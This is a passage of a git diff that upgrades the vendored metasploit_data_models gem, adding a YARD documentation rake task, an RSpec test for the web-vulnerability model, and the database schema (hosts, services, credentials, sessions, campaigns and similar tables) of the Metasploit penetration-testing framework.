remain below 1.0.0 + VERSION = '0.5.1' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake new file mode 100644 index 0000000000..cc279684e7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake @@ -0,0 +1,27 @@ +# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both +# the below rake tasks and when invoking `yard` from the command line + +require 'yard' +require 'yard/rake/yardoc_task' + +namespace :yard do + YARD::Rake::YardocTask.new(:doc) do |t| + # --no-stats here as 'stats' task called after will print fuller stats + t.options = ['--no-stats'] + + t.after = Proc.new { + Rake::Task['yard:stats'].execute + } + end + + desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" + task :stats => :environment do + stats = YARD::CLI::Stats.new + stats.run('--compact', '--list-undoc') + end +end + +# @todo Figure out how to just clone description from yard:doc +desc "Generate YARD documentation" +# allow calling namespace to as a task that goes to default task for namespace +task :yard => ['yard:doc'] \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec similarity index 88% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec index ec0d9dd672..c3f3788558 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec @@ -18,6 +18,10 @@ Gem::Specification.new do |s| # ---- Dependencies ---- s.add_development_dependency 'rake' + # markdown formatting for yard + s.add_development_dependency 'redcarpet' + # documentation + s.add_development_dependency 'yard' s.add_runtime_dependency 'activerecord', '>= 3.2.10' s.add_runtime_dependency 'activesupport' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb new file mode 100644 index 0000000000..d55706f947 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb @@ -0,0 +1,87 @@ +require 'spec_helper' + +describe Mdm::WebVuln do + let(:confidence_range) do + 1 .. 100 + end + + let(:methods) do + [ + 'GET', + 'POST', + # XXX not sure why PATH is valid since it's not an HTTP method verb. + 'PATH' + ] + end + + let(:risk_range) do + 0 .. 5 + end + + context 'associations' do + it { should belong_to(:web_site).class_name('Mdm::WebSite') } + end + + context 'CONSTANTS' do + it 'should define CONFIDENCE_RANGE' do + described_class::CONFIDENCE_RANGE.should == confidence_range + end + + it 'should define METHODS in any order' do + described_class::METHODS.should =~ methods + end + + it 'should define RISK_RANGE' do + described_class::RISK_RANGE.should == risk_range + end + end + + context 'database' do + context 'columns' do + it { should have_db_column(:blame).of_type(:text) } + it { should have_db_column(:category).of_type(:text).with_options(:null => false) } + it { should have_db_column(:confidence).of_type(:text).with_options(:null => false) } + it { should have_db_column(:description).of_type(:text) } + it { should have_db_column(:method).of_type(:string).with_options(:limit => 1024, :null => false) } + it { should have_db_column(:name).of_type(:string).with_options(:limit => 1024, :null => false) } + it { should have_db_column(:owner).of_type(:string) } + it { should have_db_column(:params).of_type(:text).with_options(:null => false) } + it { should have_db_column(:path).of_type(:text).with_options(:null => false) } + it { should have_db_column(:payload).of_type(:text) } + it { should have_db_column(:pname).of_type(:text).with_options(:null => false) } + it { should have_db_column(:proof).of_type(:binary).with_options(:null => false) } + it { should have_db_column(:query).of_type(:text) } + it { should have_db_column(:request).of_type(:binary) } + it { should have_db_column(:risk).of_type(:integer).with_options(:null => false) } + it { should have_db_column(:web_site_id).of_type(:integer).with_options(:null => false) } + + context 'timestamps' do + it { should have_db_column(:created_at).of_type(:datetime).with_options(:null => false) } + it { should have_db_column(:updated_at).of_type(:datetime).with_options(:null => false) } + end + end + + context 'indices' do + it { should have_db_index(:method) } + it { should have_db_index(:name) } + it { should have_db_index(:path) } + end + end + + context 'validations' do + it { should validate_presence_of :category } + it { should ensure_inclusion_of(:confidence).in_range(confidence_range) } + it { should ensure_inclusion_of(:method).in_array(methods) } + it { should validate_presence_of :name } + it { should validate_presence_of :path } + it { should validate_presence_of :params } + it { should validate_presence_of :pname } + it { should validate_presence_of :proof } + it { should ensure_inclusion_of(:risk).in_range(risk_range) } + it { should validate_presence_of :web_site } + end + + context 'serializations' do + it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) } + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb new file mode 100644 index 0000000000..bd6f124190 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb @@ -0,0 +1,638 @@ +# encoding: UTF-8 +# This file is auto-generated from the current state of the database. Instead +# of editing this file, please use the migrations feature of Active Record to +# incrementally modify your database, and then regenerate this schema definition. +# +# Note that this schema.rb definition is the authoritative source for your +# database schema. If you need to create the application database on another +# system, you should be using db:schema:load, not running all the migrations +# from scratch. The latter is a flawed and unsustainable approach (the more migrations +# you'll amass, the slower it'll run and the greater likelihood for issues). +# +# It's strongly recommended to check this file into your version control system. + +ActiveRecord::Schema.define(:version => 20130228214900) do + + create_table "api_keys", :force => true do |t| + t.text "token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "attachments", :force => true do |t| + t.string "name", :limit => 512 + t.binary "data" + t.string "content_type", :limit => 512 + t.boolean "inline", :default => true, :null => false + t.boolean "zip", :default => false, :null => false + t.integer "campaign_id" + end + + create_table "attachments_email_templates", :id => false, :force => true do |t| + t.integer "attachment_id" + t.integer "email_template_id" + end + + create_table "campaigns", :force => true do |t| + t.integer "workspace_id", :null => false + t.string "name", :limit => 512 + t.text "prefs" + t.integer "status", :default => 0 + t.datetime "started_at" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "clients", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.string "ua_string", :limit => 1024, :null => false + t.string "ua_name", :limit => 64 + t.string "ua_ver", :limit => 32 + t.datetime "updated_at" + t.integer "campaign_id" + end + + create_table "creds", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "user", :limit => 2048 + t.string "pass", :limit => 4096 + t.boolean "active", :default => true + t.string "proof", :limit => 4096 + t.string "ptype", :limit => 256 + t.integer "source_id" + t.string "source_type" + end + + create_table "email_addresses", :force => true do |t| + t.integer "campaign_id", :null => false + t.string "first_name", :limit => 512 + t.string "last_name", :limit => 512 + t.string "address", :limit => 512 + t.boolean "sent", :default => false, :null => false + t.datetime "clicked_at" + end + + create_table "email_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "subject", :limit => 1024 + t.text "body" + t.integer "parent_id" + t.integer "campaign_id" + t.text "prefs" + end + + create_table "events", :force => true do |t| + t.integer "workspace_id" + t.integer "host_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.string "username" + t.text "info" + end + + create_table "exploit_attempts", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.integer "port" + t.string "proto" + t.text "fail_detail" + end + + create_table "exploited_hosts", :force => true do |t| + t.integer "host_id", :null => false + t.integer "service_id" + t.string "session_uuid", :limit => 8 + t.string "name", :limit => 2048 + t.string "payload", :limit => 2048 + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "host_details", :force => true do |t| + t.integer "host_id" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string "src" + t.string "nx_site_name" + t.string "nx_site_importance" + t.string "nx_scan_template" + t.float "nx_risk_score" + end + + create_table "hosts", :force => true do |t| + t.datetime "created_at" + t.string "address", :limit => nil + t.string "mac" + t.string "comm" + t.string "name" + t.string "state" + t.string "os_name" + t.string "os_flavor" + t.string "os_sp" + t.string "os_lang" + t.string "arch" + t.integer "workspace_id" + t.datetime "updated_at" + t.text "purpose" + t.string "info", :limit => 65536 + t.text "comments" + t.text "scope" + t.text "virtual_host" + t.integer "note_count", :default => 0 + t.integer "vuln_count", :default => 0 + t.integer "service_count", :default => 0 + t.integer "host_detail_count", :default => 0 + t.integer "exploit_attempt_count", :default => 0 + end + + add_index "hosts", ["address"], :name => "index_hosts_on_address" + add_index "hosts", ["name"], :name => "index_hosts_on_name" + add_index "hosts", ["os_flavor"], :name => "index_hosts_on_os_flavor" + add_index "hosts", ["os_name"], :name => "index_hosts_on_os_name" + add_index "hosts", ["purpose"], :name => "index_hosts_on_purpose" + add_index "hosts", ["state"], :name => "index_hosts_on_state" + + create_table "hosts_tags", :id => false, :force => true do |t| + t.integer "host_id" + t.integer "tag_id" + end + + create_table "imported_creds", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "user", :limit => 512 + t.string "pass", :limit => 512 + t.string "ptype", :limit => 16, :default => "password" + end + + create_table "listeners", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.integer "workspace_id", :default => 1, :null => false + t.integer "task_id" + t.boolean "enabled", :default => true + t.text "owner" + t.text "payload" + t.text "address" + t.integer "port" + t.binary "options" + t.text "macro" + end + + create_table "loots", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.integer "host_id" + t.integer "service_id" + t.string "ltype", :limit => 512 + t.string "path", :limit => 1024 + t.text "data" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "content_type" + t.text "name" + t.text "info" + end + + create_table "macros", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "owner" + t.text "name" + t.text "description" + t.binary "actions" + t.binary "prefs" + end + + create_table "mod_refs", :force => true do |t| + t.string "module", :limit => 1024 + t.string "mtype", :limit => 128 + t.text "ref" + end + + create_table "module_actions", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_actions", ["module_detail_id"], :name => "index_module_actions_on_module_detail_id" + + create_table "module_archs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_archs", ["module_detail_id"], :name => "index_module_archs_on_module_detail_id" + + create_table "module_authors", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + t.text "email" + end + + add_index "module_authors", ["module_detail_id"], :name => "index_module_authors_on_module_detail_id" + + create_table "module_details", :force => true do |t| + t.datetime "mtime" + t.text "file" + t.string "mtype" + t.text "refname" + t.text "fullname" + t.text "name" + t.integer "rank" + t.text "description" + t.string "license" + t.boolean "privileged" + t.datetime "disclosure_date" + t.integer "default_target" + t.text "default_action" + t.string "stance" + t.boolean "ready" + end + + add_index "module_details", ["description"], :name => "index_module_details_on_description" + add_index "module_details", ["mtype"], :name => "index_module_details_on_mtype" + add_index "module_details", ["name"], :name => "index_module_details_on_name" + add_index "module_details", ["refname"], :name => "index_module_details_on_refname" + + create_table "module_mixins", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_mixins", ["module_detail_id"], :name => "index_module_mixins_on_module_detail_id" + + create_table "module_platforms", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_platforms", ["module_detail_id"], :name => "index_module_platforms_on_module_detail_id" + + create_table "module_refs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_refs", ["module_detail_id"], :name => "index_module_refs_on_module_detail_id" + add_index "module_refs", ["name"], :name => "index_module_refs_on_name" + + create_table "module_targets", :force => true do |t| + t.integer "module_detail_id" + t.integer "index" + t.text "name" + end + + add_index "module_targets", ["module_detail_id"], :name => "index_module_targets_on_module_detail_id" + + create_table "nexpose_consoles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "enabled", :default => true + t.text "owner" + t.text "address" + t.integer "port", :default => 3780 + t.text "username" + t.text "password" + t.text "status" + t.text "version" + t.text "cert" + t.binary "cached_sites" + t.text "name" + end + + create_table "notes", :force => true do |t| + t.datetime "created_at" + t.string "ntype", :limit => 512 + t.integer "workspace_id", :default => 1, :null => false + t.integer "service_id" + t.integer "host_id" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.text "data" + end + + add_index "notes", ["ntype"], :name => "index_notes_on_ntype" + + create_table "profiles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "active", :default => true + t.text "name" + t.text "owner" + t.binary "settings" + end + + create_table "refs", :force => true do |t| + t.integer "ref_id" + t.datetime "created_at" + t.string "name", :limit => 512 + t.datetime "updated_at" + end + + add_index "refs", ["name"], :name => "index_refs_on_name" + + create_table "report_templates", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "path", :limit => 1024 + t.text "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "reports", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "rtype" + t.string "path", :limit => 1024 + t.text "options" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.datetime "downloaded_at" + t.integer "task_id" + t.string "name", :limit => 63 + end + + create_table "routes", :force => true do |t| + t.integer "session_id" + t.string "subnet" + t.string "netmask" + end + + create_table "services", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.integer "port", :null => false + t.string "proto", :limit => 16, :null => false + t.string "state" + t.string "name" + t.datetime "updated_at" + t.text "info" + end + + add_index "services", ["name"], :name => "index_services_on_name" + add_index "services", ["port"], :name => "index_services_on_port" + add_index "services", ["proto"], :name => "index_services_on_proto" + add_index "services", ["state"], :name => "index_services_on_state" + + create_table "session_events", :force => true do |t| + t.integer "session_id" + t.string "etype" + t.binary "command" + t.binary "output" + t.string "remote_path" + t.string "local_path" + t.datetime "created_at" + end + + create_table "sessions", :force => true do |t| + t.integer "host_id" + t.string "stype" + t.string "via_exploit" + t.string "via_payload" + t.string "desc" + t.integer "port" + t.string "platform" + t.text "datastore" + t.datetime "opened_at", :null => false + t.datetime "closed_at" + t.string "close_reason" + t.integer "local_id" + t.datetime "last_seen" + end + + create_table "tags", :force => true do |t| + t.integer "user_id" + t.string "name", :limit => 1024 + t.text "desc" + t.boolean "report_summary", :default => false, :null => false + t.boolean "report_detail", :default => false, :null => false + t.boolean "critical", :default => false, :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "tasks", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "module" + t.datetime "completed_at" + t.string "path", :limit => 1024 + t.string "info" + t.string "description" + t.integer "progress" + t.text "options" + t.text "error" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "result" + t.string "module_uuid", :limit => 8 + t.binary "settings" + end + + create_table "users", :force => true do |t| + t.string "username" + t.string "crypted_password" + t.string "password_salt" + t.string "persistence_token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "fullname" + t.string "email" + t.string "phone" + t.string "company" + t.string "prefs", :limit => 524288 + t.boolean "admin", :default => true, :null => false + end + + create_table "vuln_attempts", :force => true do |t| + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.text "fail_detail" + end + + create_table "vuln_details", :force => true do |t| + t.integer "vuln_id" + t.float "cvss_score" + t.string "cvss_vector" + t.string "title" + t.text "description" + t.text "solution" + t.binary "proof" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string "nx_vuln_id" + t.float "nx_severity" + t.float "nx_pci_severity" + t.datetime "nx_published" + t.datetime "nx_added" + t.datetime "nx_modified" + t.text "nx_tags" + t.text "nx_vuln_status" + t.text "nx_proof_key" + t.string "src" + t.integer "nx_scan_id" + t.datetime "nx_vulnerable_since" + t.string "nx_pci_compliance_status" + end + + create_table "vulns", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.string "info", :limit => 65536 + t.datetime "exploited_at" + t.integer "vuln_detail_count", :default => 0 + t.integer "vuln_attempt_count", :default => 0 + end + + add_index "vulns", ["name"], :name => "index_vulns_on_name" + + create_table "vulns_refs", :id => false, :force => true do |t| + t.integer "ref_id" + t.integer "vuln_id" + end + + create_table "web_forms", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.string "method", :limit => 1024 + t.text "params" + t.text "query" + end + + add_index "web_forms", ["path"], :name => "index_web_forms_on_path" + + create_table "web_pages", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.text "query" + t.integer "code", :null => false + t.text "cookie" + t.text "auth" + t.text "ctype" + t.datetime "mtime" + t.text "location" + t.text "headers" + t.binary "body" + t.binary "request" + end + + add_index "web_pages", ["path"], :name => "index_web_pages_on_path" + add_index "web_pages", ["query"], :name => "index_web_pages_on_query" + + create_table "web_sites", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "vhost", :limit => 2048 + t.text "comments" + t.text "options" + end + + add_index "web_sites", ["comments"], :name => "index_web_sites_on_comments" + add_index "web_sites", ["options"], :name => "index_web_sites_on_options" + add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost" + + create_table "web_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "title", :limit => 512 + t.string "body", :limit => 524288 + t.integer "campaign_id" + t.text "prefs" + end + + create_table "web_vulns", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path", :null => false + t.string "method", :limit => 1024, :null => false + t.text "params", :null => false + t.text "pname", :null => false + t.integer "risk", :null => false + t.string "name", :limit => 1024, :null => false + t.text "query" + t.text "category", :null => false + t.text "confidence", :null => false + t.text "description" + t.text 